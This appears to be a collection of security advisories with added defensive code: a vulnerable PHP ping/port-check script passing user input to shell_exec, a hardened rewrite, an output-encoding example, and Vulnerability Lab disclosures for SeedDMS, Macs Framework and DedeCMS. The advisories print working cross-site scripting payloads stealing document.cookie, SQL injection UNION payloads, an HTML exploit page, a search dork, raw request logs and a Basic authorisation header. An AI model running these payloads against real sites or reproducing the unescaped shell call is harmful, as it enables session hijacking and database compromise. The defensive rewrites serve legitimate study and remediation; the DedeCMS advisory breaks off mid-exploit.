    $id = str_replace('.','_',$host);
    if(($out == "1") || ($out == "0")){
        echo json_encode(array("id"=>"h$id","res"=>"$out"));
    }else{
        ## if it returns nothing, assume network is messed up
        echo json_encode(array("id"=>"h$id","res"=>"0"));
    }
}
if(isset($_GET['socket'])){
    $xml = simplexml_load_file("config.xml");
    //$xml = simplexml_load_file("good.xml");
    if($_GET['socket'] == ""){
        $host = "127.0.0.1 80";
    }else{
        $host = str_replace(':',' ',$_GET['socket']);
    }
    // same pattern: the user-supplied host:port reaches nc unescaped
    $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1');
    $id = str_replace('.','_',$host);
    $id = str_replace(' ','_',$id);
    if(preg_match("/succeeded/",$out)){
        echo json_encode(array("id"=>"h$id","res"=>"1"));
    }else{
        ## if it returns nothing, assume network is messed up
        echo json_encode(array("id"=>"h$id","res"=>"0"));
    }
}
?>
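As an added example (not code from the Pinger project or the advisory author), the same two handlers rewritten so that the host never reaches the shell unvalidated; the helper names are invented here, and it assumes the same config.xml layout with a backend/timeout element that the original reads.

```php
<?php
// Added example, not the Pinger project's code: a hardened rewrite of the two
// handlers shown above. Hosts are validated before any shell call and every
// argument is passed through escapeshellarg(); helper names are made up here.
// Assumption: config.xml carries the same <backend><timeout> element the original reads.
declare(strict_types=1);

/**
 * Accept an IPv4/IPv6 literal or an RFC 1123 hostname, else return null.
 * Neither form may contain ';', '|', quotes or whitespace, so the
 * "ping=;echo ..." payload from the PoC is rejected before reaching the shell.
 */
function validate_host(string $raw): ?string
{
    $host = trim($raw);
    if ($host === '') {
        return '127.0.0.1';   // the original handler's default
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    // labels of [A-Za-z0-9-], 1-63 chars, no leading/trailing '-', 253 chars total
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    if (strlen($host) <= 253 && preg_match('/^' . $label . '(\.' . $label . ')*\z/', $host) === 1) {
        return $host;
    }
    return null;
}

/** Clamp the configured timeout to a bounded integer instead of trusting the XML string. */
function bounded_timeout(SimpleXMLElement $xml): int
{
    return max(1, min((int) $xml->backend->timeout, 30));
}

/** Command for the ping handler, or null when the host is rejected. */
function build_ping_command(string $rawHost, int $timeout): ?string
{
    $host = validate_host($rawHost);
    if ($host === null) {
        return null;
    }
    return 'ping -n -q -c 1 -w ' . $timeout . ' ' . escapeshellarg($host)
        . " | grep received | awk '{print \$4}'";
}

/** Command for the socket handler from "host:port", or null when either part is invalid. */
function build_socket_command(string $rawSocket, int $timeout): ?string
{
    if (trim($rawSocket) === '') {
        $rawSocket = '127.0.0.1:80';   // the original handler's default
    }
    if (preg_match('/^(.+):(\d{1,5})\z/', $rawSocket, $m) !== 1) {
        return null;
    }
    $host = validate_host($m[1]);
    $port = (int) $m[2];
    if ($host === null || $port < 1 || $port > 65535) {
        return null;
    }
    return 'nc -v -z -w ' . $timeout . ' ' . escapeshellarg($host) . ' ' . $port . ' 2>&1';
}

// Handlers keep the original JSON contract; a rejected host gets HTTP 400
// instead of being spliced into a shell command.
$xml = simplexml_load_file('config.xml');
if ($xml === false) {
    http_response_code(500);
    exit;
}
$timeout = bounded_timeout($xml);

if (isset($_GET['ping'])) {
    $cmd = build_ping_command((string) $_GET['ping'], $timeout);
    if ($cmd === null) {
        http_response_code(400);
        echo json_encode(['error' => 'invalid host']);
        exit;
    }
    $out = trim((string) shell_exec($cmd));
    $id  = str_replace('.', '_', (string) validate_host((string) $_GET['ping']));
    echo json_encode(['id' => "h$id", 'res' => in_array($out, ['0', '1'], true) ? $out : '0']);
}

if (isset($_GET['socket'])) {
    $cmd = build_socket_command((string) $_GET['socket'], $timeout);
    if ($cmd === null) {
        http_response_code(400);
        echo json_encode(['error' => 'invalid host or port']);
        exit;
    }
    $out = (string) shell_exec($cmd);
    $id  = str_replace(['.', ':'], '_', (string) $_GET['socket']);   // already validated above
    echo json_encode(['id' => "h$id", 'res' => strpos($out, 'succeeded') !== false ? '1' : '0']);
}
```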
-
SeedDMS 5.1.18 - Persistent Cross-Site Scripting
# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: https://www.seeddms.org
# Software Link: https://www.seeddms.org/index.php?id=7
# CVE: N/A

Document Title:
===============
SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2209

Release Date:
=============
2020-04-15

Vulnerability Laboratory ID (VL-ID):
====================================
2209

Common Vulnerability Scoring System:
====================================
4.3

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
SeedDMS is a free document management system with an easy to use web based user interface. It is based on PHP and MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of development have made it a mature, powerful and enterprise ready platform for sharing and storing documents. It is fully compatible with its predecessor LetoDMS.

(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & https://www.seeddms.org/index.php?id=7 )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application.
Affected Product(s):
====================
Uwe Steinmann
Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, v5.1.16, v5.1.18 and v6.0.7

Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Multiple persistent cross site scripting web vulnerabilities have been discovered in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent cross site scripting web vulnerabilities are located in the `name` and `comment` parameters of the `AddEvent.php` file. Remote attackers are able to add their own event via op.AddEvent with malicious script code. The request method to inject is POST and the attack vector is located on the application side. After the injection, the execution occurs in the admin panel within the `Log Management` - `Webdav` and `Web` views. The content of the comment and name is pushed unescaped into the logs with an html/js template. This allows an attacker to remotely exploit the issue with a simple POST injection from outside with lower privileges.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] op.AddEvent (AddEvent.php)

Vulnerable Parameter(s):
[+] name
[+] comment

Affected Module(s):
[+] Log Management (out.LogManagement.php)

Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with a low privileged web-application user account and low user interaction. For security demonstration or to reproduce the security web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Start your local webbrowser and tamper the http protocol session
2. Open the AddEvent.php and add a new event
3. Insert your script code test payload inside the Name or Comments path
4. Save or submit the entry with error
Note: Now the web and webdav log has captured the insert or error
5. Now wait until the administrator previews in the log management the web or webdav view function
6. Successful reproduce of the persistent web vulnerability!
PoC: Vulnerable Source (Log Management - View)
<pre>Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog ?logname=20200413.log
Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe src="evil.source" onload="alert(document.cookie)"></iframe>
&comment=<iframe src="evil.source" onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199
</pre>

PoC: Payload
>"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe>

--- PoC Session Logs (POST) ---
https://SeedDMS.localhost:8080/out/out.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2973
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
https://SeedDMS.localhost:8080/op/op.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 356
Origin: https://SeedDMS.localhost:8080
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
from=2020-04-13&to=2020-04-13&name=>"<iframe src=evil.source onload=alert(document.cookie)></iframe>&comment=>"<iframe src=evil.source onload=alert(document.cookie)></iframe>
-
POST: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Note: Injection Point via Calendar op.AddEvent Name & Comment

--- PoC Session Logs (GET) ---
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 273
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
https://SeedDMS.localhost:8080/out/evil.source
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: /out/out.ViewFolder.php
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Note: Execution Point via Log Management (AP) on Webdav View or Web View

Reference(s):
https://SeedDMS.localhost:8080/
https://SeedDMS.localhost:8080/op/op.AddEvent.php
https://SeedDMS.localhost:8080/out/out.ViewFolder.php
https://SeedDMS.localhost:8080/out/out.AddEvent.php
https://SeedDMS.localhost:8080/out/out.LogManagement.php
https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=

Solution - Fix & Patch:
=======================
1. Parse and escape the name and comment input fields on transmit to sanitize
2. Filter and restrict the input fields of the name and comment parameters for special chars to prevent injects
3. Parse the output location of all web and webdav logfiles to prevent the execution point

Security Risk:
==============
The security risk of the persistent cross site web vulnerabilities in the seeddms web-application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
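Added example, not code from SeedDMS, AirDisk Pro or Vulnerability Lab: context-aware output encoding for the sinks this advisory and the AirDisk Pro advisory above describe (a log viewer printing event names and comments; a file table that puts a folder name into an href, a text node and an inline onclick handler), with helper names and sample inputs constructed here. The same encoding applies to reflected sinks such as the search and password-reset messages in the Macs Framework advisory further down.

```php
<?php
// Added example, not SeedDMS, AirDisk Pro or Vulnerability Lab code: output
// encoding chosen per context for the sinks described in the advisories, a <pre>
// log viewer that prints event names/comments, and a file table that puts a
// folder name into an href, a text node and an inline onclick handler.
// Helper names and the sample inputs are constructed for this example.
declare(strict_types=1);

/** For HTML text nodes and quoted attribute values. */
function html_encode(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * For a string literal inside an inline event handler: json_encode() yields a JS
 * string literal with <, >, &, ' and " hex-escaped, and the result is HTML-encoded
 * again because the handler lives in an HTML attribute.
 */
function js_string_in_attr(string $s): string
{
    $js = json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE);
    if ($js === false) {
        $js = '""';   // invalid UTF-8: emit an empty literal rather than raw bytes
    }
    return html_encode($js);
}

/** For one path segment in an href: percent-encode, then HTML-encode for the attribute. */
function url_segment_in_attr(string $s): string
{
    return html_encode(rawurlencode($s));
}

/** One SeedDMS-style log line for a <pre> viewer; the whole line is a text node. */
function render_log_line(string $line): string
{
    return html_encode($line) . "\n";
}

/** One AirDisk-style folder row with the same name used in three contexts. */
function render_folder_row(string $name): string
{
    return '<tr>'
        . '<td class="n"><a href="' . url_segment_in_attr($name) . '/">' . html_encode($name) . '</a></td>'
        . '<td class="e"><a href="#" title="Rename file" onclick="modalPopup(' . js_string_in_attr($name) . ', 0, 0);">rename</a></td>'
        . '</tr>';
}

/** Self-check with inputs modelled on the advisories' payloads; true when no raw markup survives. */
function self_check(): bool
{
    $logLine = 'Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe src="evil.source" onload="alert(document.cookie)"></iframe>';
    $folder  = 'test>"<iframe src=evil.source>';
    $log = render_log_line($logLine);
    $row = render_folder_row($folder);
    // No literal tag or bare quote reaches the parser in any of the three contexts.
    if (strpos($log, '<iframe') !== false || strpos($row, '<iframe') !== false) return false;
    if (strpos($row, 'onclick="modalPopup(&quot;test\u003E\u0022\u003Ciframe') === false) return false;
    if (strpos($row, 'href="test%3E%22%3Ciframe%20src%3Devil.source%3E/"') === false) return false;
    return strpos($log, '&lt;iframe src=&quot;evil.source&quot;') !== false;
}

echo self_check() ? "self-check passed\n" : "self-check FAILED\n";
```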
-
Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download
# CVE: N/A

Document Title:
===============
Macs Framework v1.14f CMS - Multiple Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2206

Release Date:
=============
2020-04-14

Vulnerability Laboratory ID (VL-ID):
====================================
2206

Common Vulnerability Scoring System:
====================================
7.4

Vulnerability Class:
====================
Multiple

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management System. It focuses mainly on the Edit In Place editing concept. It comes with a built in blog with moderation support, user manager section, roles manager section, SEO / SEF URL.

https://sourceforge.net/projects/macs-framework/files/latest/download

(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Macs Framework v1.1.4f CMS.
Affected Product(s):
====================
Macrob7
Product: Macs Framework v1.14f - Content Management System

Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
1.1 & 1.2
Multiple non-persistent cross site scripting web vulnerabilities have been discovered in the official Mac Framework v1.1.4f Content Management System. The vulnerability allows remote attackers to manipulate client-side browser-to-web-application requests to compromise user session credentials or to manipulate module content.

The first vulnerability is located in the search input field of the search module. Remote attackers are able to inject their own malicious script code as a search entry to execute the code within the results page that is loaded shortly after the request is performed. The request method to inject is POST and the attack vector is located on the client side with a non-persistent attack vector.

The second vulnerability is located in the email input field of the account reset function. Remote attackers are able to inject their own malicious script code as the email used to reset the password, so that the code executes within the performed request. The request method to inject is POST and the attack vector is located on the client side with a non-persistent attack vector.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] searchString
[+] emailAddress

1.3
Multiple remote sql-injection web vulnerabilities have been discovered in the official Mac Framework v1.1.4f Content Management System. The vulnerability allows remote attackers to inject or execute their own sql commands to compromise the dbms or file system of the application.

The sql injection vulnerabilities are located in the `roleId` and `userId` parameters of the `editRole` and `deleteUser` modules. The request method to inject or execute commands is GET and the attack vector is located on the application side. Attackers with privileged accounts to edit are able to inject their own sql queries via roleId and userId on deleteUser or editRole. Multiple unhandled and broken sql queries are visible as default debug output for users as well. Exploitation of the remote sql injection vulnerability requires no user interaction and a privileged web-application user account.

Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] deleteUser
[+] editRole

Vulnerable Parameter(s):
[+] userId
[+] roleId

Proof of Concept (PoC):
=======================
Google Dork(s): intitle, subtitle & co.
Site Powered by Mac's PHP MVC Framework
Framework of the future
Design downloaded from Zeroweb.org: Free website templates, layouts, and tools.

1.1
The non-persistent cross site scripting web vulnerability can be exploited by remote attackers without a user account and with low user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.
PoC: Payload
>">"<iframe src=evil.source onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0

PoC: Vulnerable Source
<form method="post" action="https://macs-cms.localhost:8080/index.php/search" id="searchForm">
<span class="searchLabel">Search Site:</span><input type="searchString" value="" name="searchString" class="searchString">
<input type="submit" value="Search" class="searchSubmit">
</form><br>
<span class="error">No Results found for: "<iframe src="evil.source" onload="alert(document.cookie)"></span>

--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/search
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://macs-cms.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
Upgrade-Insecure-Requests: 1
searchString=>">"<iframe src=evil.source onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 9865

1.2
The non-persistent cross site scripting web vulnerability can be exploited by remote attackers without a user account and with low user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com

PoC: Vulnerable Source
<form method="post" action="https://macs-cms.localhost:8080/index.php/main/cms/login" class="ajax" ajaxoutput="#loginMessage">
<table style="width:100%">
<tbody><tr>
<td style="width: 20px">Username:</td>
<td><input type="text" name="username"></td>
</tr>
<tr>
<td>Password:</td>
<td><input type="password" name="password"></td>
</tr>
<tr>
<td colspan="2"><input type="submit" value="Login"></td>
</tr>
<tr>
<td colspan="2"><br><div id="loginMessage" style="display: block;">Invalid Username or Password</div></td>
</tr>
</tbody></table>
<br>
<a href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword" class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a>
<input type="hidden" name="scrollPosition" value="102"></form>
<div id="forgotPassword" style="display: block;">
<form class="ajax" method="post" action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess" ajaxoutput="#forgotPasswordReturn">
Enter your email address: <input type="text" name="emailAddress"><br>
<input type="submit" value="Send Email">
</form>
<br>
<div id="forgotPasswordReturn" style="display: block;">Cannot find user with Email address: test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com</iframe></div>
</div>

--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 335
-
https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true&=&emailAddress=test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 105

1.3
The remote sql injection web vulnerability can be exploited by remote attackers with a privileged application user account and without user interaction. For security demonstration or to reproduce the sql injection web vulnerability follow the provided information and steps below to continue.
PoC: Payload
%27-1%20order%20by%205--
%27-1%20union select 1,2,3,4,@@version--

PoC: Exploitation
<html>
<head><body><title>Mac's CMS SQL Injection PoC</title>
<iframe src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20>
<iframe src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union select 1,2,3,4,@@version--%20>
<iframe src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20>
<iframe src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union select 1,2,3,4,@@version--%20>
</body></head>
</html>

--- PoC Session Logs [GET] ---
https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1 order by 5--
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1;
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 53

--- [SQL Error Exception Logs] ---
SQLSTATE[HY000]: General error: 1 near "1": syntax error - Error executing SQL statement
SQLSTATE[HY000]: General error: 1 unrecognized token: "''';" - Error executing SQL statement
SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range - should be between 1 and 5 - 5.0.12 'pwnd
This page was created in 1.5665068626404 seconds

Security Risk:
==============
1.1 & 1.2
The security risk of the client-side cross site scripting web vulnerabilities in the search and email reset function is estimated as medium.
1.3
The security risk of the remote sql injection web vulnerabilities in the id parameters on delete is estimated as high.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM
-
DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
# Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor Link: http://www.dedecms.com
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A

Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2195

Release Date:
=============
2020-04-09

Vulnerability Laboratory ID (VL-ID):
====================================
2195

Common Vulnerability Scoring System:
====================================
4.3

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Welcome to use the most professional PHP website content management system in China-Zhimeng content management system, he will be your first choice for easy website building. Adopt XML name space style core templates: all templates are saved in file form, which provides great convenience for users to design templates and website upgrade transfers. The robust template tags provide strong support for webmasters to DIY their own websites. High-efficiency tag caching mechanism: Allows the caching of similar tags. When generating HTML, it helps to improve the reaction speed of the system and reduce the resources consumed by the system.

(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the official DedeCMS v5.7 SP2 (UTF8) web-application.

Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System v5.7 SP2

Vulnerability Disclosure Timeline:
==================================
2020-04-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerabilities have been discovered in the official DedeCMS v5.7 SP2 UTF8 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent script code inject web vulnerabilities are located in the `activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor` and `CKEditorFuncNum` parameters of the `file_pic_view.php`, `file_manage_view.php`, `tags_main.php`, `select_media.php` and `media_main.php` files. The attack vector of the vulnerability is non-persistent and the request method to inject is POST. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST

Vulnerable File(s):
[+] file_pic_view.php
[+] file_manage_view.php
[+] tags_main.php
[+] select_media.php
[+] media_main.php

Vulnerable Parameter(s):
[+] tag
[+] keyword
[+] activepath
[+] fmdo=move&filename & fmdo=edit&filename
[+] CKEditor & CKEditor=body&CKEditorFuncNum

Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers with a privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Request: Examples
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads
https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc
https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en

PoC: Payload
".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].* onload=alert(document.domain)>
>"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png onload=alert(document.domain)">
>"><iframe src=evil.source onload=alert(document.domain)>
%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E
%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E
%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E

PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
